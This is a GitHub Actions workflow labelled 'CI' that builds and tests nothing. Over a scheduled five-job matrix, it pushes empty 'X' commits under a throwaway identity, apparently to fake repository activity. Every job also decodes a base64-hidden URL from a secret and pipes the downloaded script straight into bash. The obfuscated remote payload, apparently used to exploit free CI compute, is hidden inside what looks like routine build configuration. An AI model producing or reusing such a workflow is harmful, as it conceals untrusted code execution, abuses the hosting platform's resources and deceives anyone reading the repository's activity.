name: CI

on:
  push:
  schedule:
    - cron: '0 3 * * *'
    - cron: '0 10 * * *'
    - cron: '0 19 * * *'
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    strategy:
      matrix:
        instance: [1, 2, 3, 4, 5]

    steps:
      - uses: actions/checkout@v4
      - name: Auto green
        if: matrix.instance == 1
        run: |
          git config --local user.email "module0012312@qq.com"
          git config --local user.name "module0012312"
          git remote set-url origin https://${{ github.actor }}:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}
          git pull --rebase
          git commit --allow-empty -m "X"
          git push
      - name: Run VMSpace
        run: |
          curl "$(echo '${{ secrets.X }}' | base64 -d)" | bash
